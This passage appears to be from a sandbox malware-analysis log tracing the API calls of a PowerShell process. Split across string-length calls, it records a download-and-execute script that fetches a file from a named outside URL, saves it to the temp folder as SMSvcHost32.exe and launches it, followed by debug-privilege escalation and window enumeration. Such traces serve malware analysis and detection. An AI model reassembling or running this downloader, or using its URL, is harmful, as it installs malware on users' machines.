	          end_va = 0x1505fff0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000001505fff0000"
	        filename = ""

Region:
	              id = 834
	        start_va = 0x7ffc10530000
	          end_va = 0x7ffc105a8fff
	     entry_point = 0x7ffc10530000
	     region_type = mapped_file
	            name = "apphelp.dll"
	        filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll")

Region:
	              id = 849
	        start_va = 0x7ff7f40c0000
	          end_va = 0x7ff7f4460fff
	     entry_point = 0x7ff7f40c0000
	     region_type = mapped_file
	            name = "sysmain.sdb"
	        filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb")


Thread:
	id = 14
	os_tid = 0xff4

	[0039.110] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0039.114] RoInitialize () returned 0x1
	[0039.114] RoUninitialize () returned 0x0
	[0039.153] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0039.153] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0039.550] SysStringByteLen (bstr="$svabjzvv") returned 0x12
	[0039.550] SysStringByteLen (bstr="$svabjzvv") returned 0x12
	[0039.550] SysStringByteLen (bstr="=") returned 0x2
	[0039.550] SysStringByteLen (bstr="=") returned 0x2
	[0039.550] SysStringByteLen (bstr="New-Object") returned 0x14
	[0039.550] SysStringByteLen (bstr="New-Object") returned 0x14
	[0039.550] SysStringByteLen (bstr="-ComObject") returned 0x14
	[0039.550] SysStringByteLen (bstr="-ComObject") returned 0x14
	[0039.550] SysStringByteLen (bstr="Msxml2.XMLHTTP;") returned 0x1e
	[0039.550] SysStringByteLen (bstr="Msxml2.XMLHTTP;") returned 0x1e
	[0039.550] SysStringByteLen (bstr="$iadjti") returned 0xe
	[0039.550] SysStringByteLen (bstr="$iadjti") returned 0xe
	[0039.550] SysStringByteLen (bstr="=") returned 0x2
	[0039.550] SysStringByteLen (bstr="=") returned 0x2
	[0039.550] SysStringByteLen (bstr="New-Object") returned 0x14
	[0039.550] SysStringByteLen (bstr="New-Object") returned 0x14
	[0039.550] SysStringByteLen (bstr="-ComObject") returned 0x14
	[0039.550] SysStringByteLen (bstr="-ComObject") returned 0x14
	[0039.550] SysStringByteLen (bstr="ADODB.Stream;") returned 0x1a
	[0039.550] SysStringByteLen (bstr="ADODB.Stream;") returned 0x1a
	[0039.550] SysStringByteLen (bstr="$iyfigisyb") returned 0x14
	[0039.550] SysStringByteLen (bstr="$iyfigisyb") returned 0x14
	[0039.550] SysStringByteLen (bstr="=") returned 0x2
	[0039.550] SysStringByteLen (bstr="=") returned 0x2
	[0039.550] SysStringByteLen (bstr="$env:temp") returned 0x12
	[0039.550] SysStringByteLen (bstr="$env:temp") returned 0x12
	[0039.550] SysStringByteLen (bstr="+") returned 0x2
	[0039.550] SysStringByteLen (bstr="+") returned 0x2
	[0039.550] SysStringByteLen (bstr="'\\SMSvcHost32.exe';$svabjzvv.open('GET',") returned 0x50
	[0039.550] SysStringByteLen (bstr="'\\SMSvcHost32.exe';$svabjzvv.open('GET',") returned 0x50
	[0039.550] SysStringByteLen (bstr="'http://amd.martatovaglieri.it/upll?26201',") returned 0x56
	[0039.550] SysStringByteLen (bstr="'http://amd.martatovaglieri.it/upll?26201',") returned 0x56
	[0039.550] SysStringByteLen (bstr="$false);$svabjzvv.send();") returned 0x32
	[0039.550] SysStringByteLen (bstr="$false);$svabjzvv.send();") returned 0x32
	[0039.550] SysStringByteLen (bstr="if($svabjzvv.Status") returned 0x26
	[0039.550] SysStringByteLen (bstr="if($svabjzvv.Status") returned 0x26
	[0039.551] SysStringByteLen (bstr="-eq") returned 0x6
	[0039.551] SysStringByteLen (bstr="-eq") returned 0x6
	[0039.551] SysStringByteLen (bstr="200){$iadjti.open();$iadjti.type") returned 0x40
	[0039.551] SysStringByteLen (bstr="200){$iadjti.open();$iadjti.type") returned 0x40
	[0039.551] SysStringByteLen (bstr="=") returned 0x2
	[0039.551] SysStringByteLen (bstr="=") returned 0x2
	[0039.551] SysStringByteLen (bstr="1;$iadjti.write($svabjzvv.responseBody);$iadjti.position") returned 0x70
	[0039.551] SysStringByteLen (bstr="1;$iadjti.write($svabjzvv.responseBody);$iadjti.position") returned 0x70
	[0039.551] SysStringByteLen (bstr="=") returned 0x2
	[0039.551] SysStringByteLen (bstr="=") returned 0x2
	[0039.551] SysStringByteLen (bstr="0;$iadjti.savetofile($iyfigisyb);$iadjti.close();}") returned 0x64
	[0039.551] SysStringByteLen (bstr="0;$iadjti.savetofile($iyfigisyb);$iadjti.close();}") returned 0x64
	[0039.551] SysStringByteLen (bstr="Start-Process") returned 0x1a
	[0039.551] SysStringByteLen (bstr="Start-Process") returned 0x1a
	[0039.551] SysStringByteLen (bstr="$iyfigisyb;") returned 0x16
	[0039.551] SysStringByteLen (bstr="$iyfigisyb;") returned 0x16
	[0039.800] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x184b47da00*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184b47da00*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0
	[0039.801] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x184b47d9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184b47d9f8*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0xfb, [1]=0xf7, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0039.801] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x184b47d980*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184b47d980*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0
	[0039.805] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x184b47da80*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0xfb, [1]=0xf7, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1)) | out: ActivityId=0x184b47da80*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0xfb, [1]=0xf7, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0039.807] EtwEventRegister (in: ProviderId=0x15047076530, EnableCallback=0x1505f5a3e6c, CallbackContext=0x0, RegHandle=0x15047076508 | out: RegHandle=0x15047076508) returned 0x0
	[0039.813] EtwEventRegister (in: ProviderId=0x15047077a58, EnableCallback=0x1505f5a3ebc, CallbackContext=0x0, RegHandle=0x15047077a38 | out: RegHandle=0x15047077a38) returned 0x0
	[0039.814] EtwEventSetInformation (RegHandle=0x240150455412d0, InformationClass=0x2, EventInformation=0x15047077938, InformationLength=0x33) returned 0x0
	[0039.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0x184b47b270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40
	[0039.820] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47b730) returned 1
	[0039.820] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x184b47b810 | out: lpFileInformation=0x184b47b810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0039.820] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47b6f0) returned 1
	[0039.943] EtwEventWriteTransfer (RegHandle=0x230150455400c0, EventDescriptor=0x184b47da90, ActivityId=0x184b47d970, RelatedActivityId=0x0, UserDataCount=0x0, UserData=0x0) returned 0x0
	[0039.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47d230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0039.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47d330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0039.954] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184b47d770) returned 1
	[0039.955] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.management.automation\\v4.0_3.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x184b47d850 | out: lpFileInformation=0x184b47d850*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2c94e9, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2c94e9, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2ef73f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6d2a00)) returned 1
	[0039.955] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184b47d730) returned 1
	[0039.956] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x184b47d928 | out: lpdwHandle=0x184b47d928) returned 0x93c
	[0039.957] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x93c, lpData=0x1504707d510 | out: lpData=0x1504707d510) returned 1
	[0039.958] VerQueryValueW (in: pBlock=0x1504707d510, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x184b47d8a8, puLen=0x184b47d8a0 | out: lplpBuffer=0x184b47d8a8*=0x1504707d5ac, puLen=0x184b47d8a0) returned 1
	[0039.961] VerQueryValueW (in: pBlock=0x1504707d510, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x184b47d848, puLen=0x184b47d840 | out: lplpBuffer=0x184b47d848*=0x1504707d688, puLen=0x184b47d840) returned 1
	[0039.961] VerQueryValueW (in: pBlock=0x1504707d510, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x184b47d848, puLen=0x184b47d840 | out: lplpBuffer=0x184b47d848*=0x1504707d6dc, puLen=0x184b47d840) returned 1
	[0039.961] VerQueryValueW (in: pBlock=0x1504707d510, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x184b47d848, puLen=0x184b47d840 | out: lplpBuffer=0x184b47d848*=0x1504707d738, puLen=0x184b47d840) returned 1
	[0039.962] VerQueryValueW (in: pBlock=0x1504707d510, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x184b47d848, puLen=0x184b47d840 | out: lplpBuffer=0x184b47d848*=0x1504707d774, puLen=0x184b47d840) returned 1
	[0039.962] VerQueryValueW (in: pBlock=0x1504707d510, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x184b47d848, puLen=0x184b47d840 | out: lplpBuffer=0x184b47d848*=0x1504707d7dc, puLen=0x184b47d840) returned 1
	[0039.962] VerQueryValueW (in: pBlock=0x1504707d510, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x184b47d848, puLen=0x184b47d840 | out: lplpBuffer=0x184b47d848*=0x1504707d878, puLen=0x184b47d840) returned 1
	[0039.962] VerQueryValueW (in: pBlock=0x1504707d510, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x184b47d848, puLen=0x184b47d840 | out: lplpBuffer=0x184b47d848*=0x1504707d8dc, puLen=0x184b47d840) returned 1
	[0039.962] VerQueryValueW (in: pBlock=0x1504707d510, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x184b47d848, puLen=0x184b47d840 | out: lplpBuffer=0x184b47d848*=0x1504707d958, puLen=0x184b47d840) returned 1
	[0039.962] VerQueryValueW (in: pBlock=0x1504707d510, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x184b47d848, puLen=0x184b47d840 | out: lplpBuffer=0x184b47d848*=0x1504707d604, puLen=0x184b47d840) returned 1
	[0039.962] VerQueryValueW (in: pBlock=0x1504707d510, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x184b47d848, puLen=0x184b47d840 | out: lplpBuffer=0x184b47d848*=0x0, puLen=0x184b47d840) returned 0
	[0039.962] VerQueryValueW (in: pBlock=0x1504707d510, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x184b47d848, puLen=0x184b47d840 | out: lplpBuffer=0x184b47d848*=0x0, puLen=0x184b47d840) returned 0
	[0039.962] VerQueryValueW (in: pBlock=0x1504707d510, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x184b47d848, puLen=0x184b47d840 | out: lplpBuffer=0x184b47d848*=0x0, puLen=0x184b47d840) returned 0
	[0039.962] VerQueryValueW (in: pBlock=0x1504707d510, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x184b47d7f8, puLen=0x184b47d7f0 | out: lplpBuffer=0x184b47d7f8*=0x1504707d5ac, puLen=0x184b47d7f0) returned 1
	[0039.962] VerLanguageNameW (in: wLang=0x0, szLang=0x184b47d520, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0039.991] VerQueryValueW (in: pBlock=0x1504707d510, lpSubBlock="\\", lplpBuffer=0x184b47d848, puLen=0x184b47d840 | out: lplpBuffer=0x184b47d848*=0x1504707d538, puLen=0x184b47d840) returned 1
	[0039.993] GetCurrentProcessId () returned 0xff8
	[0040.006] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x184b47c8a0 | out: lpLuid=0x184b47c8a0*(LowPart=0x14, HighPart=0)) returned 1
	[0040.007] GetCurrentProcess () returned 0xffffffffffffffff
	[0040.007] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x184b47c898 | out: TokenHandle=0x184b47c898*=0x26c) returned 1
	[0040.007] AdjustTokenPrivileges (in: TokenHandle=0x26c, DisableAllPrivileges=0, NewState=0x150470804f8*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0040.008] CloseHandle (hObject=0x26c) returned 1
	[0040.009] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xff8) returned 0x26c
	[0040.016] EnumProcessModules (in: hProcess=0x26c, lphModule=0x15047080560, cb=0x200, lpcbNeeded=0x184b47d838 | out: lphModule=0x15047080560, lpcbNeeded=0x184b47d838) returned 1
	[0040.017] GetModuleInformation (in: hProcess=0x26c, hModule=0x7ff7f50e0000, lpmodinfo=0x150470807d0, cb=0x18 | out: lpmodinfo=0x150470807d0*(lpBaseOfDll=0x7ff7f50e0000, SizeOfImage=0x78000, EntryPoint=0x7ff7f50e31a0)) returned 1
	[0040.018] CoTaskMemAlloc (cb=0x804) returned 0x15045584b90
	[0040.018] GetModuleBaseNameW (in: hProcess=0x26c, hModule=0x7ff7f50e0000, lpBaseName=0x15045584b90, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0040.018] CoTaskMemFree (pv=0x15045584b90) 
	[0040.018] CoTaskMemAlloc (cb=0x804) returned 0x15045583b70
	[0040.019] GetModuleFileNameExW (in: hProcess=0x26c, hModule=0x7ff7f50e0000, lpFilename=0x15045583b70, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0040.019] CoTaskMemFree (pv=0x15045583b70) 
	[0040.019] CloseHandle (hObject=0x26c) returned 1
	[0040.021] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xff8) returned 0x26c
	[0040.021] GetExitCodeProcess (in: hProcess=0x26c, lpExitCode=0x1504707f67c | out: lpExitCode=0x1504707f67c*=0x103) returned 1
	[0040.024] EnumWindows (lpEnumFunc=0x1505f5a3f0c, lParam=0x0) returned 1
	[0040.025] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x958
	[0040.025] GetWindowThreadProcessId (in: hWnd=0x1010a, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x8e8
	[0040.025] GetWindowThreadProcessId (in: hWnd=0x100d6, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x8b4
	[0040.026] GetWindowThreadProcessId (in: hWnd=0x100b0, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x8b4
	[0040.026] GetWindowThreadProcessId (in: hWnd=0x100b4, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x8b4
	[0040.026] GetWindowThreadProcessId (in: hWnd=0x100c0, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x8b4
	[0040.026] GetWindowThreadProcessId (in: hWnd=0x100ca, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x8b4
	[0040.026] GetWindowThreadProcessId (in: hWnd=0x100ce, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x8b4
	[0040.026] GetWindowThreadProcessId (in: hWnd=0x10096, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x8b4
	[0040.026] GetWindowThreadProcessId (in: hWnd=0x100a4, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x8b4
	[0040.026] GetWindowThreadProcessId (in: hWnd=0x100c8, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x8b4
	[0040.026] GetWindowThreadProcessId (in: hWnd=0x1008c, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x8b4
	[0040.026] GetWindowThreadProcessId (in: hWnd=0x101e0, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xb9c
	[0040.027] GetWindowThreadProcessId (in: hWnd=0x100e2, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x850
	[0040.027] GetWindowThreadProcessId (in: hWnd=0x100d8, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x8b4
	[0040.027] GetWindowThreadProcessId (in: hWnd=0x70224, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xff4
	[0040.027] GetWindow (hWnd=0x70224, uCmd=0x4) returned 0x0
	[0040.028] IsWindowVisible (hWnd=0x70224) returned 0
	[0040.028] GetWindowThreadProcessId (in: hWnd=0x2022a, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xf20
	[0040.028] GetWindowThreadProcessId (in: hWnd=0x801ec, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xd50
	[0040.028] GetWindowThreadProcessId (in: hWnd=0x60048, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x9a4
	[0040.028] GetWindowThreadProcessId (in: hWnd=0x2021c, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xc44
	[0040.028] GetWindowThreadProcessId (in: hWnd=0x30218, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xc2c
	[0040.028] GetWindowThreadProcessId (in: hWnd=0x30216, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xa94
	[0040.028] GetWindowThreadProcessId (in: hWnd=0x30108, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xc20
	[0040.028] GetWindowThreadProcessId (in: hWnd=0x6006a, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x610
	[0040.029] GetWindowThreadProcessId (in: hWnd=0x6003a, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xfe8
	[0040.029] GetWindowThreadProcessId (in: hWnd=0x30040, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xfc4
	[0040.029] GetWindowThreadProcessId (in: hWnd=0x3014e, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xfb0
	[0040.029] GetWindowThreadProcessId (in: hWnd=0x301d0, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xf90
	[0040.029] GetWindowThreadProcessId (in: hWnd=0x40212, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xf7c
	[0040.029] GetWindowThreadProcessId (in: hWnd=0x2020e, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xf64
	[0040.029] GetWindowThreadProcessId (in: hWnd=0x3014a, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xf48
	[0040.029] GetWindowThreadProcessId (in: hWnd=0x30146, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xf28
	[0040.029] GetWindowThreadProcessId (in: hWnd=0x20148, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xf0c
	[0040.030] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xef8
	[0040.030] GetWindowThreadProcessId (in: hWnd=0x30092, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xee4
	[0040.030] GetWindowThreadProcessId (in: hWnd=0x4001e, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xed0
	[0040.030] GetWindowThreadProcessId (in: hWnd=0x3013c, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xebc
	[0040.030] GetWindowThreadProcessId (in: hWnd=0x2019a, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xea8
	[0040.030] GetWindowThreadProcessId (in: hWnd=0x300fc, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xe94
	[0040.030] GetWindowThreadProcessId (in: hWnd=0x101ea, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xb98
	[0040.030] GetWindowThreadProcessId (in: hWnd=0x101e2, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xb9c
	[0040.030] GetWindowThreadProcessId (in: hWnd=0x101de, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xb9c
	[0040.031] GetWindowThreadProcessId (in: hWnd=0x101da, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xb9c
	[0040.031] GetWindowThreadProcessId (in: hWnd=0x101d8, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xb98
	[0040.031] GetWindowThreadProcessId (in: hWnd=0x101d4, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xb98
	[0040.031] GetWindowThreadProcessId (in: hWnd=0x101c4, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xb9c
	[0040.031] GetWindowThreadProcessId (in: hWnd=0x101bc, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x8b4
	[0040.031] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xb78
	[0040.031] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0xb78
	[0040.031] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x8b4
	[0040.031] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x94c
	[0040.031] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x8e8
	[0040.032] GetWindowThreadProcessId (in: hWnd=0x1012c, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x8e8
	[0040.032] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x8e8
	[0040.032] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x8e8
	[0040.032] GetWindowThreadProcessId (in: hWnd=0x1012a, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x8e8
	[0040.032] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x8e8
	[0040.032] GetWindowThreadProcessId (in: hWnd=0x10106, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x8e8
	[0040.032] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x8e8
	[0040.032] GetWindowThreadProcessId (in: hWnd=0x100fe, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x8e8
	[0040.032] GetWindowThreadProcessId (in: hWnd=0x100f0, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x850
	[0040.032] GetWindowThreadProcessId (in: hWnd=0x100ee, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x850
	[0040.032] GetWindowThreadProcessId (in: hWnd=0x200e6, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x8c8
	[0040.033] GetWindowThreadProcessId (in: hWnd=0x100cc, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x8b4
	[0040.033] GetWindowThreadProcessId (in: hWnd=0x100b8, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x8b4
	[0040.033] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x860
	[0040.033] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x850
	[0040.033] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x850
	[0040.033] GetWindowThreadProcessId (in: hWnd=0x1001c, lpdwProcessId=0x184b47d670 | out: lpdwProcessId=0x184b47d670) returned 0x2d0
